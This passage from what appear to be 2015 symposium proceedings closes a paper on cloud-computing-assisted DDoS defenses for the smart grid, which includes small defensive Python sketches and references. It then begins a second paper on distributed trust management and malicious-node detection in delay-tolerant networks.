in traffic patterns on OSI layer 7 that do not match normal traffic patterns collected from training data. This detection method has seen limited success against DDoS attacks because of the size and perceived legitimacy of BOTNETs. Anomalies are not detected when traffic seems to comply with normal traffic patterns. This technique may only be effective if irregularities can be detected regarding the geographical location of IP addresses or the percentage of new IP addresses seen by the victim [28]. Historical data from geographically diverse CSP resources may make anomaly detection techniques more effective by providing a more robust dataset for analysis. The agile and elastic performance capabilities of CC may enable more resilient mitigation algorithms, such as an adaptive system for detecting XML and HTTP application layer attacks [37], and SOTA [38] to further mitigate X-DoS and DX-DoS attacks.
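
The training-data idea can be sketched with a simple statistical baseline, assuming a z-score test on request rates (the k = 3 threshold is an assumption, not from the papers cited):

```python
import statistics

class RateAnomalyDetector:
    """Learn the mean and standard deviation of request rates from
    training data, then flag windows deviating by more than k
    standard deviations from that baseline."""

    def __init__(self, training_rates, k=3.0):
        self.mean = statistics.mean(training_rates)
        self.stdev = statistics.pstdev(training_rates)
        self.k = k

    def is_anomalous(self, rate):
        if self.stdev == 0:
            return rate != self.mean
        return abs(rate - self.mean) / self.stdev > self.k
```

As the text notes, a botnet that mimics the learned pattern evades this check; richer, geographically diverse training data from CSP resources is what would tighten the baseline.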

C. Attack Source Identification

Attack source identification attempts to locate where DDoS attacks originate. These techniques are highly dependent on the Internet router infrastructure, and because DDoS attacks originate from different geographical locations, many traceback schemes are not effective against DDoS attacks. The hash-based IP traceback method is worth mentioning, as it has been shown to be effective against DDoS attacks, with some caveats [39]. The network topology possibilities offered by SG and CC [13] may enable new attack source identification schemes that succeed where traditional traceback schemes have fallen short [29]. For hash-based traceback to be effective, there needs to be a wide geographic distribution of modern traceback routers and an abundance of computing overhead to analyze packet data, especially over long periods of time [39]. Assuming that CSPs have a large distribution of traceback routers throughout their network, and that cloud resources are spread out geographically, IP traceback could take advantage of the agile and redundant resources available in CC. These agile and redundant computational capabilities could be leveraged for packet filtering techniques working in conjunction with other DDoS defense mechanisms [40] to sustain SG services, and to perform data analysis from traceback routers on the CSP network to aid ingress and egress filtering.
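
The storage trick behind hash-based IP traceback [39] is that each router keeps a space-efficient digest of every packet it forwards, so a victim can later ask routers along candidate paths whether they saw a given attack packet. A Bloom-filter sketch of such a digest table (sizes and hash counts are illustrative assumptions):

```python
import hashlib

class DigestTable:
    """Bloom-filter sketch of a router's per-interval packet digests:
    record() sets bits derived from invariant packet bytes; saw()
    answers later traceback queries."""

    def __init__(self, m=8192, hashes=3):
        self.bits = bytearray(m // 8)
        self.m = m
        self.hashes = hashes

    def _positions(self, packet: bytes):
        # Derive `hashes` bit positions from salted SHA-256 digests.
        for i in range(self.hashes):
            h = hashlib.sha256(i.to_bytes(1, "big") + packet).digest()
            yield int.from_bytes(h[:4], "big") % self.m

    def record(self, packet: bytes):
        for p in self._positions(packet):
            self.bits[p // 8] |= 1 << (p % 8)

    def saw(self, packet: bytes) -> bool:
        return all(self.bits[p // 8] & (1 << (p % 8))
                   for p in self._positions(packet))
```

A True answer means "probably forwarded" (Bloom filters admit rare false positives), while False means "definitely not forwarded"; the asymmetry is what makes router-by-router path reconstruction possible.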

D. Attack Reaction

Attack reaction techniques attempt to mitigate or eliminate the effects of a DDoS attack. For the future SG, this is a necessary feature to prevent the SG from being completely paralyzed by an attack [3]. Methods include, but are not limited to, filtering out bad traffic, duplicating network resources, or even assigning costs to certain processes or transactions to limit the abuse of computational resources. CC offers many opportunities to enhance these capabilities, increasing their capacity and endurance.

History-based IP filtering (HIP) is a mechanism where routers allow incoming packets when they are verified against a pre-populated IP address database [41]. This defensive method is rendered meaningless if devices with a legitimate purpose on the SG are compromised and being used as part of a BOTNET [42]. HIP filtering defense could leverage the geographic diversity, agility, and elastic performance of CC, but more detail would be needed about how CSPs would implement the verification process for IPs to know how and when this would be a benefit.
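
The HIP verification step can be sketched in a few lines, assuming the simplest possible history database (a set of source IPs seen during normal operation); as noted above, compromised legitimate SG devices would pass this check:

```python
class HistoryFilter:
    """History-based IP filtering sketch: record sources of completed,
    legitimate connections during normal operation; during an attack,
    admit only previously seen sources."""

    def __init__(self):
        self.known = set()
        self.under_attack = False

    def observe_legitimate(self, ip):
        self.known.add(ip)

    def admit(self, ip):
        # Outside attack periods everything passes; during an attack
        # only historical clients do.
        return True if not self.under_attack else ip in self.known
```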

Load balancing is implemented when there is a need to increase the available server functions for critical systems to prevent them from shutting down in the event of a DDoS attack [42]. Load balancing has the capability to utilize computational resources across distributed networks [43], readily utilizing inherent abilities of CC such as agility and redundancy, real-time response and elastic performance, and virtualization and automation services [43], [44]. There are challenges to overcome, such as the cost of the distributed computational load [45], latency, and computational bottlenecks [46], but if properly implemented, the benefits of load balancing could be used by CSPs to help mitigate the effects of a DDoS attack made against the SG.
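
A minimal round-robin sketch of the load-balancing idea, with an elastic scale-out hook standing in for a CSP adding VMs under load (purely illustrative, not a production scheduler):

```python
class LoadBalancer:
    """Round-robin request distribution over a growable server pool."""

    def __init__(self, servers):
        self.servers = list(servers)
        self._i = 0

    def route(self, request):
        # Pick the next server in rotation and hand it the request.
        server = self.servers[self._i % len(self.servers)]
        self._i += 1
        return server, request

    def scale_out(self, server):
        # Elastic capacity: the pool grows when attack traffic rises.
        self.servers.append(server)
```

Under attack, `scale_out` is the step CC makes cheap: extra VMs absorb flood traffic so critical SG services stay responsive.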

Selective pushback attempts to filter the data stream close to the DDoS attack source by determining the source of the attack and sending the location data to all upstream routers [33]. When attack traffic is normally distributed, or the attack origin IP is spoofed, attempts to filter attack traffic become difficult [28]. Regardless of the exact technique used to monitor network congestion and packet legitimacy, the goal of the pushback method is to filter the bad traffic as close to the source of the attack as possible. CC would be deployed indirectly, much like with DoS-Attack-Specific Detection and IP traceback, taking advantage of agility, geographic diversity, and elastic performance to enhance the effectiveness of pushback schemes, such as the cooperative pushback mechanism proposed by [33].

Source-end reaction schemes, such as D-WARD, attempt to catalog data flow statistics by constantly monitoring the two-way traffic between the source network and the rest of the Internet [47]. Statistics are collected such as the ratio of in-traffic to out-traffic and the number of connections per destination. The system periodically compares collected data against normal flow data models for each type of traffic that the source network receives, and if a mismatch occurs, traffic is either filtered or rate-limited [47]. Barring privacy issues, the agility of CC could be leveraged with virtualization and automation services to catalog the traffic between SG infrastructure, CSP resources, utility companies, and infrastructure control networks, creating a robust dataset that could be used to protect the SG infrastructure. Additionally, the elastic performance of CC could be leveraged to quickly and efficiently compare historical and new data to detect irregularities and generate a quicker attack response.
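
The per-destination bookkeeping of a source-end scheme like D-WARD [47] can be sketched as follows; comparing bytes sent against bytes flowing back is the core idea, while the ratio threshold here is an illustrative assumption:

```python
class SourceEndMonitor:
    """Track two-way traffic per destination at the source network's
    exit point; a flow sending far more than it receives back is a
    candidate for rate-limiting."""

    def __init__(self, max_out_in_ratio=10.0):
        self.max_ratio = max_out_in_ratio  # assumed threshold
        self.stats = {}  # destination -> [bytes_out, bytes_in]

    def record(self, dst, bytes_out=0, bytes_in=0):
        out, inn = self.stats.get(dst, [0, 0])
        self.stats[dst] = [out + bytes_out, inn + bytes_in]

    def should_rate_limit(self, dst):
        out, inn = self.stats.get(dst, [0, 0])
        return out / max(inn, 1) > self.max_ratio
```

In the cloud-assisted version the text suggests, these counters would be kept per traffic type and checked against historical flow models rather than a single fixed ratio.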

Analysis of traffic data attempts to identify forensic information in event logs that can identify the specific features and patterns of a DDoS attack [41]. This form of defense only works if a DDoS attack against the system has occurred, data was able to be collected and analyzed, and defense mechanisms have been created to filter or throttle future attack traffic [42]. Event logs from firewalls, server logs, and honeypots would be analyzed to determine the attributes of future DDoS attacks [41]. CC attributes such as agility, real-time response and elastic performance, and virtualization and automation services could be used to enhance the capabilities of event log analysis, in addition to automating security patches to firewalls and applying configuration updates to honeypots based on analysis results.



TABLE II. DEFENSE TECHNIQUES AND BENEFICIAL CLOUD COMPUTING ATTRIBUTES

Type of Defense              | Type of Attack                                              | Defense Technique             | Beneficial CC Attributes*
Attack Prevention            | SYN Flood (TCP), Smurf Attack, PDF GET, HTTP GET, HTTP POST | Honeypots                     | AR, SH, V
Attack Detection             | SYN Flood, Smurf Attack                                     | DoS-Attack-Specific Detection | AR, DLI, RPP
Attack Detection             | PDF GET, HTTP GET, HTTP POST                                | Anomaly-Based Detection       | AR, DLI, RPP
Attack Source Identification | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Hash-Based IP Traceback       | AR, DLI
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | HIP Filtering                 | AR, DLI, RPP
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Load Balancing                | AR, RPP
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Selective Pushback            | AR, DLI, RPP
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Source-End Reaction           | AR, RPP
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Analysis of Traffic Data      | AR, RPP, SH, V
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Fault Tolerance               | AR, DLI, RPP, SH, V
Attack Reaction              | SYN Flood, Smurf Attack; PDF GET, HTTP GET, HTTP POST       | Resource Pricing              | AR, DLI, RPP, V

*AR: Agility & Redundancy, SH: Self-healing, V: Virtualization, DLI: Device & Location Independence, RPP: Real-time Response & Elastic Performance

The Fault Tolerance method assumes that it is impossible to prevent or stop DDoS attacks completely, and instead focuses on mitigating the effects of attacks so the affected network can remain operational. The methodology is based on duplicating network services and diversifying points of access to the network. In the event of an attack, the congestion caused by attack traffic will not take down all of the affected network. Similarly to load balancing, fault tolerance methods could leverage CC attributes, such as agility and redundancy, real-time response and elastic performance, and virtualization and automation services, to duplicate services and keep the SG network responsive for legitimate traffic.

Resource Pricing is a mitigation approach that utilizes a distributed gateway architecture and payment protocol to establish a dynamically changing cost, or computational burden, for initiating different types of network services [48]. This technique favors users who behave well and discriminates against users who abuse system resources, partitioning services into pricing tiers to prevent malicious users from flooding the system with fake requests in an attempt at price manipulation. The high agility and elastic performance inherent in CC would alleviate the computational burden of Resource Pricing techniques [49]. As the demand for assigning prices to users grows, the computational demand could easily be met by the ability of CSPs to add additional computing resources. Cost levels could easily be assigned to put users into a cost hierarchy, and virtualization capabilities could be used to duplicate network resources and infrastructure capabilities, partitioning users paying different cost levels into separate processing areas. Illegitimate traffic would be sectioned off from legitimate traffic, reducing the impact of an attack, and could, if needed, be geographically independent.
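
A toy sketch of the resource-pricing idea: the computational "price" of a request grows with current system load and with the client's recent request volume, so well-behaved users pay little while a flooder's cost escalates. The pricing formula and constants are assumptions for illustration, not taken from [48]:

```python
class PricingGateway:
    """Distributed-gateway pricing sketch: quote a cost for each
    request based on load and the client's request history."""

    def __init__(self, base_price=1.0):
        self.base = base_price
        self.requests = {}  # client -> request count this period

    def price(self, client, system_load):
        n = self.requests.get(client, 0)
        self.requests[client] = n + 1
        # Assumed schedule: the price doubles with each prior request
        # in the period and scales with current system load.
        return self.base * (1 + system_load) * (2 ** n)
```

The exponential term is what partitions users into de facto tiers: a handful of legitimate requests stays cheap, while a flood of fake requests quickly becomes computationally prohibitive.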

Table II summarizes the DDoS defense techniques that can be enhanced by utilizing CC attributes to defend the SG against DDoS attacks.

E. Other Approaches to Consider

Even before CC was aptly branded as such, it was argued that isolated defense mechanisms fail to offer performance guarantees against DDoS attacks [50]. This would require a paradigm shift, where systems acting in isolation would instead act as a distributed framework of non-hierarchical, specialized

defense nodes connecting to one another to achieve a better overall level of defense against DDoS attacks. Distributed control architectures, such as the ENERGOS project [51], propose a multi-layered system of intelligent nodes that contain enough operational information to carry on complex tasks if there is a hierarchical breakdown of communication. The caveat of this approach is that it requires the availability of advanced processing capabilities and a networked infrastructure robust enough to support large data streams.

IV. CONCLUSION

As innovations to our personal devices, automated homes, and electric vehicles continue to close the gap between cyber and physical, the SG and CC will eventually become connected, if not integrated with one another. The proliferation of SG technology has presented energy suppliers and utility companies with challenges that CC could readily meet, but not without mitigating many of CC's outstanding issues. Carelessness in the deployment of CC solutions for SG applications may result in an environment that is more prone to cyber-attacks such as DDoS. Unless a separate communications network is layered on top of the electrical grid [6], the danger of a DDoS attack from those with malicious intent, whether for financial gain or to terrorize our society, remains a very real possibility with severe consequences. The critical nature of the SG means that a real defense solution needs to be developed to protect against DDoS attacks. Victims of DDoS attacks need an easily scalable approach that can quickly add additional resources to defend against DDoS attacks. CC provides the ability to distribute this computational burden across a large pool of resources to compensate for a rapid increase in computational needs. Leveraging the inherent attributes of CC to help defend against DDoS attacks may not be a permanent solution, but it may be the most readily available answer to this need. While the integration of CC and SG is inevitable, the features of CC can be leveraged to improve defense against DDoS attacks.

REFERENCES

[1] S. Goel, S. F. Bush, and D. Bakken, IEEE Vision for Smart Grid Communications: 2030 and Beyond. IEEE, 2013.



[2] Y. Mo, T.-H. Kim, K. Brancik, D. Dickinson, H. Lee, A. Perrig, and B. Sinopoli, “Cyber-physical security of a smart grid infrastructure,” Proceedings of the IEEE, vol. 100, no. 1, pp. 195–209, 2012.

[3] R. E. Brown, “Impact of smart grid on distribution system design,” in Power and Energy Society General Meeting-Conversion and Delivery of Electrical Energy in the 21st Century, 2008 IEEE. IEEE, 2008, pp. 1–4.

[4] M. Yigit, V. C. Gungor, and S. Baktir, “Cloud computing for smart grid applications,” Computer Networks, vol. 70, pp. 312–329, 2014.

[5] X. Fang, D. Yang, and G. Xue, “Evolving smart grid information management cloudward: A cloud optimization perspective,” Smart Grid, IEEE Transactions on, vol. 4, no. 1, pp. 111–119, 2013.

[6] S. Goel, “Anonymity vs. security: The right balance for the smart grid,” Communications of the Association for Information Systems, vol. 36, no. 1, p. 2, 2015.

[7] D. Wei, Y. Lu, M. Jafari, P. M. Skare, and K. Rohde, “Protecting smart grid automation systems against cyberattacks,” Smart Grid, IEEE Transactions on, vol. 2, no. 4, pp. 782–795, 2011.

[8] J. Liu, Y. Xiao, S. Li, W. Liang, and C. Chen, “Cyber security and privacy issues in smart grids,” Communications Surveys & Tutorials, IEEE, vol. 14, no. 4, pp. 981–997, 2012.

[9] A. Wokutch, “The role of non-utility service providers in smart grid development: Should they be regulated, and if so, who can regulate them?” Journal of Telecommunications and High Technology Law, vol. 9, p. 531, 2011.

[10] S. Iyer, “Cyber security for smart grid, cryptography, and privacy,” International Journal of Digital Multimedia Broadcasting, vol. 2011, 2011.

[11] J. Mirkovic and P. Reiher, “A taxonomy of ddos attack and ddos defense mechanisms,” ACM SIGCOMM Computer Communication Review, vol. 34, no. 2, pp. 39–53, 2004.

[12] W. Wang and Z. Lu, “Cyber security in the smart grid: Survey and challenges,” Computer Networks, vol. 57, no. 5, pp. 1344–1371, 2013.

[13] A. Hahn, A. Ashok, S. Sridhar, and M. Govindarasu, “Cyber-physical security testbeds: Architecture, application, and evaluation for smart grid,” Smart Grid, IEEE Transactions on, vol. 4, no. 2, pp. 847–855, 2013.

[14] T. Karnwal, T. Sivakumar, and G. Aghila, “A comber approach to protect cloud computing against xml ddos and http ddos attack,” in Electrical, Electronics and Computer Science (SCEECS), 2012 IEEE Students’ Conference on. IEEE, 2012, pp. 1–5.

[15] A. G. Tartakovsky, B. L. Rozovskii, R. B. Blazek, and H. Kim, “A novel approach to detection of intrusions in computer networks via adaptive sequential and batch-sequential change-point detection methods,” Signal Processing, IEEE Transactions on, vol. 54, no. 9, pp. 3372–3382, 2006.

[16] Z. M. Fadlullah, M. M. Fouda, N. Kato, X. Shen, and Y. Nozaki, “An early warning system against malicious activities for smart grid communications,” Network, IEEE, vol. 25, no. 5, pp. 50–55, 2011.

[17] S. Goel, Y. Hong, V. Papakonstantinou, and D. Kloza, “Smart grid security,” SpringerBriefs in Cybersecurity, 2015.

[18] B. P. Rimal, E. Choi, and I. Lumb, “A taxonomy and survey of cloud computing systems,” in INC, IMS and IDC, 2009. NCM’09. Fifth International Joint Conference on. IEEE, 2009, pp. 44–51.

[19] E. Brynjolfsson, P. Hofmann, and J. Jordan, “Cloud computing and electricity: beyond the utility model,” Communications of the ACM, vol. 53, no. 5, pp. 32–34, 2010.

[20] M. T. Khorshed, A. S. Ali, and S. A. Wasimi, “A survey on gaps, threat remediation challenges and some thoughts for proactive attack detection in cloud computing,” Future Generation Computer Systems, vol. 28, no. 6, pp. 833–851, 2012.

[21] L. Zheng, S. Chen, Y. Hu, and J. He, “Applications of cloud computing in the smart grid,” in Artificial Intelligence, Management Science and Electronic Commerce (AIMSEC), 2011 2nd International Conference on. IEEE, 2011, pp. 203–206.

[22] D. S. Markovic, D. Zivkovic, I. Branovic, R. Popovic, and D. Cvetkovic, “Smart power grid and cloud computing,” Renewable and Sustainable Energy Reviews, vol. 24, pp. 566–577, 2013.

[23] G. C. Wilshusen, Information Security: Federal Guidance Needed to Address Control Issues with Implementing Cloud Computing. DIANE Publishing, 2010.

[24] F. Luo, Z. Y. Dong, Y. Chen, Y. Xu, K. Meng, and K. P. Wong, “Hybrid cloud computing platform: the next generation it backbone for smart grid,” in Power and Energy Society General Meeting, 2012 IEEE. IEEE, 2012, pp. 1–7.

[25] Y. Dai, Y. Xiang, and G. Zhang, “Self-healing and hybrid diagnosis in cloud computing,” in Cloud Computing. Springer, 2009, pp. 45–56.

[26] A. Bakshi and B. Yogesh, “Securing cloud from ddos attacks using intrusion detection system in virtual machine,” in Communication Software and Networks, 2010. ICCSN’10. Second International Conference on. IEEE, 2010, pp. 260–264.

[27] M. Darwish, A. Ouda, and L. F. Capretz, “Cloud-based ddos attacks and defenses,” in Information Society (i-Society), 2013 International Conference on. IEEE, 2013, pp. 67–71.

[28] T. Peng, C. Leckie, and K. Ramamohanarao, “Survey of network-based defense mechanisms countering the dos and ddos problems,” ACM Computing Surveys (CSUR), vol. 39, no. 1, p. 3, 2007.

[29] K. Park and H. Lee, “On the effectiveness of route-based packet filtering for distributed dos attack prevention in power-law internets,” in ACM SIGCOMM Computer Communication Review, vol. 31, no. 4. ACM, 2001, pp. 15–26.

[30] L. Spitzner, Honeypots: Tracking Hackers. Addison-Wesley Reading, 2003, vol. 1.

[31] S. Biedermann, M. Mink, and S. Katzenbeisser, “Fast dynamic extracted honeypots in cloud computing,” in Proceedings of the 2012 ACM Workshop on Cloud Computing Security Workshop. ACM, 2012, pp. 13–18.

[32] G. Carl, G. Kesidis, R. R. Brooks, and S. Rai, “Denial-of-service attack-detection techniques,” Internet Computing, IEEE, vol. 10, no. 1, pp. 82–89, 2006.

[33] R. Mahajan, S. M. Bellovin, S. Floyd, J. Ioannidis, V. Paxson, and S. Shenker, “Controlling high bandwidth aggregates in the network,” ACM SIGCOMM Computer Communication Review, vol. 32, no. 3, pp. 62–73, 2002.

[34] T. M. Gil and M. Poletto, “Multops: a data-structure for bandwidth attack detection,” in USENIX Security Symposium, 2001.

[35] S. R. Ghanti and G. Naik, “Protection of server from syn flood attack,” Journal Impact Factor, vol. 5, no. 11, pp. 37–46, 2014.

[36] K. Choi, X. Chen, S. Li, M. Kim, K. Chae, and J. Na, “Intrusion detection of nsm based dos attacks using data mining in smart grid,” Energies, vol. 5, no. 10, pp. 4091–4109, 2012.

[37] T. Vissers, T. S. Somasundaram, L. Pieters, K. Govindarajan, and P. Hellinckx, “Ddos defense system for web services in a cloud environment,” Future Generation Computer Systems, vol. 37, pp. 37–45, 2014.

[38] A. Chonka, Y. Xiang, W. Zhou, and A. Bonti, “Cloud security defence to protect cloud computing against http-dos and xml-dos attacks,” Journal of Network and Computer Applications, vol. 34, no. 4, pp. 1097–1107, 2011.

[39] A. C. Snoeren, C. Partridge, L. A. Sanchez, C. E. Jones, F. Tchakountio, S. T. Kent, and W. T. Strayer, “Hash-based ip traceback,” in ACM SIGCOMM Computer Communication Review, vol. 31, no. 4. ACM, 2001, pp. 3–14.

[40] M. Sung and J. Xu, “Ip traceback-based intelligent packet filtering: a novel technique for defending against internet ddos attacks,” Parallel and Distributed Systems, IEEE Transactions on, vol. 14, no. 9, pp. 861–872, 2003.

[41] A. Mitrokotsa and C. Douligeris, “Denial-of-service attacks,” Network Security: Current Status and Future Directions, pp. 117–134, 2007.

[42] C. Douligeris and A. Mitrokotsa, “Ddos attacks and defense mechanisms: classification and state-of-the-art,” Computer Networks, vol. 44, no. 5, pp. 643–666, 2004.

[43] M. Randles, D. Lamb, and A. Taleb-Bendiab, “A comparative study into distributed load balancing algorithms for cloud computing,” in Advanced Information Networking and Applications Workshops (WAINA), 2010 IEEE 24th International Conference on. IEEE, 2010, pp. 551–556.



[44] S. Begum and C. Prashanth, “Review of load balancing in cloud computing,” International Journal of Computer Science Issues (IJCSI), vol. 10, no. 1, 2013.

[45] A. Khiyaita, M. Zbakh, H. El Bakkali, and D. El Kettani, “Load balancing cloud computing: state of art,” in Network Security and Systems (JNS2), 2012 National Days of. IEEE, 2012, pp. 106–109.

[46] J. Hu, J. Gu, G. Sun, and T. Zhao, “A scheduling strategy on load balancing of virtual machine resources in cloud computing environment,” in Parallel Architectures, Algorithms and Programming (PAAP), 2010 Third International Symposium on. IEEE, 2010, pp. 89–96.

[47] J. Mirkovic, G. Prier, and P. Reiher, “Attacking ddos at the source,” in Network Protocols, 2002. Proceedings. 10th IEEE International Conference on. IEEE, 2002, pp. 312–321.

[48] R. J. Gibbens and F. P. Kelly, “Resource pricing and the evolution of congestion control,” Automatica, vol. 35, no. 12, pp. 1969–1985, 1999.

[49] M. Mihailescu and Y. M. Teo, “Dynamic resource pricing on federated clouds,” in Cluster, Cloud and Grid Computing (CCGrid), 2010 10th IEEE/ACM International Conference on. IEEE, 2010, pp. 513–517.

[50] J. Mirkovic, M. Robinson, and P. Reiher, “Alliance formation for ddos defense,” in Proceedings of the 2003 Workshop on New Security Paradigms. ACM, 2003, pp. 11–18.

[51] Y. K. Penya, J. C. Nieves, A. Espinoza, C. E. Borges, A. Pena, and M. Ortega, “Distributed semantic architecture for smart grids,” Energies, vol. 5, no. 11, pp. 4824–4843, 2012.



Trust Management in Resource Constraint Networks

Thomas A. Babbitt and Boleslaw K. Szymanski
Department of Computer Science
Rensselaer Polytechnic Institute

Troy, New York
Email: {babbit, szymab}@rpi.edu

Abstract—There are numerous environments or situations where a computer network has one or more constraints. The impact of these constraints can range from minimal user inconvenience to a catastrophic reduction of capabilities. These constraints allow availability of information at the cost of abandoning the safety and reliability of traditional routing and security protocols. Environments in which such networks are needed include military battlefields, first responder missions, and remote environments. Resource Constraint Networks (RCN) are a class of networks capable of working in such austere environments. Delay Tolerant, Wireless Sensor, and some mobile and mesh ad-hoc networks fall under the broader definition of RCN. Providing information assurance (IA) security services beyond information availability, such as integrity, confidentiality, and authentication, requires significant modification to traditional routing and security protocols. One method is to manage trust in a distributed manner so that valid trust values are available to a node. Using them, a node can then make decisions on how and when to forward a message through the network. While not traditional authentication, distributed trust can be used as a probabilistic proxy, allowing for more secure transmission of information from source to destination in a RCN. The use of path information in a DTN allows for malicious node detection. We show how using erasure coding, complete path information, and inferences assists in better identifying malicious nodes in a DTN.

Keywords—Resource Constraint Networks, Delay Tolerant Networks, Distributed Trust Management, Discrete Event Simulations

I. INTRODUCTION

There are a number of scenarios where networks experience one or more significant constraints. This is either by design, due to the environment, or because of changing conditions in an environment. Military and first responders could be in situations where the lack or destruction of communication infrastructure makes using traditional networking methods difficult or impossible. A Resource Constrained Network (RCN) is any network with one or more resource constraints such that significant modification of traditional Information Assurance (IA), security, or routing protocols is required to provide the security services of information availability, integrity, authentication, confidentiality, and non-repudiation. One example discussed in the literature is Delay Tolerant Networks (DTN), where the nodes are mobile and are spread out in such a manner that static end-to-end routing is not possible and hence constrained. Another example is Wireless Sensor Networks (WSN), where nodes with minimal hardware are used to monitor environmental or other variables; the major constraint is battery power. It is challenging to provide the IA security services of integrity, authentication, and confidentiality in a RCN.

While security and trust are not equivalent, in a DTN or WSN the use of centralized servers is not feasible. The ability to trust that a node is not compromised or acting selfishly is paramount. Recently, a number of studies on trust have been published that outline a framework for trust in a DTN or WSN. The authors in [1] give a good overview of trust in multiple disciplines and propose a number of trust characteristics and properties that can be used as a baseline for determining the clues or metrics used to construct a distributed trust management system. Table I shows the characteristics and properties outlined in [1].

Resource Constrained Networks require accurate and secure message transmission like any other type of network. As previously stated, there are a number of applications and situations where a RCN is necessary. Most of the routing and security protocols in RCNs use redundancy. The authors in [2] use redundancy as a means of determining clues for use in determining path probability. This, in conjunction with the use of erasure coding, shows positive results in determining malicious nodes under a limited threat model, using only direct observations and directly connected nodes.

Recently, a few trust management schemes for use in a DTN have been proposed [3]–[5]. Each of them relies on two trust components. The first is a direct trust consisting of clues or observable actions of other nodes, and the second is an indirect trust component consisting of referrals, reputation, or recommendations from other nodes. These values are aggregated in a number of differing ways to determine a trust value that is used to identify nodes that act maliciously or selfishly. In [3] the authors use a Bayesian approach to determine the probability that a node is behaving well based on good and bad observations. In [4] the authors create a bipartite graph and find outliers; the scheme removes nodes with probabilities outside of a certain value to converge on a trust value. A third approach, outlined in [5], uses both direct and indirect metrics and determines good versus bad encounters over four categories to aggregate a trust value.

This paper advances the idea of using path, temporal, and information redundancy proposed in [2]. It shows the power of utilizing path information and introduces inferred trust properties. Further exploration of direct trust is discussed in Section II and indirect trust is presented in Section III. Conclusions and future work are discussed in Section IV.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 51

TABLE I. TRUST CHARACTERISTICS AND PROPERTIES OF A DTN [1]

Characteristics:
1) established based on potential risks
2) context-dependent
3) based on nodes' interest
4) learned
5) may represent system reliability

Properties:
1) dynamic
2) subjective
3) not necessarily transitive
4) asymmetric
5) context-dependent

II. DIRECT TRUST: USE OF FULL PATH

In a resource-constrained network, a node directly observes network traffic within its transmitter/receiver range. Based on the actions of other nodes, direct observations can be used to make trust decisions. The authors in [2] use erasure coding as a routing protocol with an appended checksum to determine clues about a node or nodes acting maliciously by modifying message segments received through normal network routing in a DTN, and then make trust decisions. This approach only takes into account nodes directly connected to the destination. The results in [2] show that using path clues to identify malicious nodes has merit.

Fig. 1 presents a state diagram showing how a node processes each message M it receives. Before sending a message to the destination, the source appends a checksum to it and, utilizing erasure coding, breaks the message into a number of segments s such that any k < s segments will enable the destination to recreate the original message. The exact encoding algorithm is not relevant to this paper; however, [6] presents a good overview of multiple encoding options in a DTN.

Assuming node i is the destination for message M, node i starts in state S1 and continues to track message segments m as they arrive. If m is unique, the segment is stored in node i's buffer and the message segment ID is saved in set nM. If m ∈ nM, then the SegMatch function is called. Once k unique segments arrive, node i attempts to recreate the message using the SegRec function. Node i then transitions to either state S2 if it fails or S3 if successful.
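The segment-handling logic just described can be sketched as a small state machine. This is an illustrative reading, not the authors' implementation; the class name, the `decode` stand-in for erasure decoding plus the checksum test, and the toy payloads are all assumptions.

```python
S1, S2, S3 = "S1_collecting", "S2_failed", "S3_recovered"

class MessageState:
    """Illustrative sketch (not the authors' code) of the Fig. 1 state
    machine: collect unique erasure-coded segments, compare duplicates
    (SegMatch), and attempt recreation (SegRec) once k unique segments
    have arrived."""
    def __init__(self, k, decode):
        self.k = k            # any k of the s segments suffice to rebuild M
        self.segments = {}    # segment id -> (payload, path) -- the set nM
        self.state = S1
        self.decode = decode  # stand-in for erasure decode + checksum check

    def seg_match(self, seg_id, payload):
        # duplicate id arriving along a second path: payloads should agree
        return self.segments[seg_id][0] == payload

    def on_segment(self, seg_id, payload, path):
        if seg_id in self.segments:           # m already in nM
            self.seg_match(seg_id, payload)   # hook for trust updates
        else:
            self.segments[seg_id] = (payload, path)
            if len(self.segments) >= self.k and self.state != S3:
                self.state = S3 if self.decode(self.segments) else S2
        return self.state

# toy run: three honest segments, k = 3, decoding always succeeds
ms = MessageState(3, decode=lambda segs: True)
for sid in ("a", "b", "c"):
    ms.on_segment(sid, payload="chunk-" + sid, path=[1, 5, 10])
print(ms.state)  # S3_recovered
```

A real node would additionally time-stamp the S3 dwell period and trigger trust updates from `seg_match` and `decode` outcomes.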

Once in state S2, node i continues to wait for additional segments m. If m ∈ nM, then SegMatch is called; else SegRec is called. If SegRec is successful, then destination i transitions to state S3; otherwise it determines whether it is better to wait or to have the message resent from the source. The utility functions for waiting are presented in [2]. If it is better to re-transmit the message, then node i sends a message to node j to resend the message.

Most routing protocols in RCNs send an acknowledgement right after a successful delivery to the destination. This clears node buffers and avoids wasting resources sending a message or segment through the network once it is successfully delivered. Taking advantage of path and temporal redundancy, node i stays in state S3 for a time period and accepts additional segments m. It continues to recreate the message using k − 1 known good segments and makes trust decisions based on the success of the message recreation.

Fig. 1. Node State Diagram

The SegRec function iterates through all combinations of message segments received for M and returns those that successfully recreate the message. When the number of segments received is exactly k, this requires one check. Once |nM| > k, then C(|nM|, k) = |nM|! / (k!(|nM| − k)!) iterations are required. This is the basis for the utility functions mentioned above for state S2.
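The combinatorial cost of that search can be made concrete with a short sketch; the function name and the trivial always-succeeding decoder are illustrative, not from the paper.

```python
from itertools import combinations
from math import comb

def seg_rec(received, k, try_decode):
    """Sketch of SegRec's search: try every k-subset of the received
    segments and return those subsets that decode successfully. The
    worst-case cost is C(|nM|, k) decode attempts, which is what the
    state-S2 utility functions weigh against re-transmission."""
    good = []
    for subset in combinations(sorted(received), k):
        if try_decode(subset):
            good.append(subset)
    return good

# with 6 segments in the buffer and k = 3, SegRec makes C(6, 3) = 20 attempts
print(comb(6, 3))  # 20
print(len(seg_rec({"a", "b", "c", "d"}, 2, lambda s: True)))  # 6
```

The binomial growth is why lingering in S2 to collect more segments eventually costs more than asking the source to re-transmit.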

A number of research questions remain. This section presents two additional concepts using direct observations to make trust decisions. The first is to utilize full path knowledge and the second is to observe differences between copies of the same message segment arriving along different paths (SegMatch).

A. Expanded Path Information

